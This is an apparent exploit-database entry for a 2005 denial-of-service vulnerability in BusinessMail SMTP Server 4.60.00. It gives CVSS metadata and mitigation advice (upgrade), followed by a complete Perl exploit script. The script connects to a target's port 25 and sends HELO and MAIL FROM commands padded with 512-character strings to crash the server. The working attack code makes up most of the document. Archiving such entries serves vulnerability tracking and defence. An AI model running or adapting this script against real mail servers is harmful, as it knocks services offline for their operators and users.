BusMail_SMTPDOS.pl

vendor:

BusinessMail SMTP Server

by:

milw0rm.com

7,5

CVSS

HIGH

Denial of Service (DoS)

400

CWE

Product Name: BusinessMail SMTP Server

Affected Version From: 4.60.00

Affected Version To: 4.60.00

Patch Exists: YES

Related CWE: N/A

CPE: a:netcplus:businessmail_smtp_server

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

BusinessMail email server system 4.60.00 is vulnerable to a Denial of Service (DoS) attack. The vulnerability is caused due to an unspecified error when handling overly long strings sent to the SMTP port (25). This can be exploited to crash the server by sending a specially crafted HELO or MAIL FROM command with an overly long string.

Mitigation:

Upgrade to the latest version of BusinessMail email server system.

Source

Exploit-DB raw data:

#===== Start BusMail_SMTPDOS.pl =====
#
# Usage: BusMail_SMTPDOS.pl <ip>
#        BusMail_SMTPDOS.pl 127.0.0.1
#
# BusinessMail email server system 4.60.00
#
# Download:
# http://www.netcplus.com/
#
##########################################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => "25",
                                    Proto    => "TCP"))
{
        print "Attempting to kill BusinessMail SMTP server at $ARGV[0]:25...\n";

        sleep(1);

        print $socket "HELO " . "A" x 512 . "\r\n";

        sleep(1);

        print $socket "MAIL FROM:" . "A" x 512 . "\r\n";

        close($socket);
}
else
{
        print "Cannot connect to $ARGV[0]:25\n";
}
#===== Start BusMail_SMTPDOS.pl =====

# milw0rm.com [2005-07-30]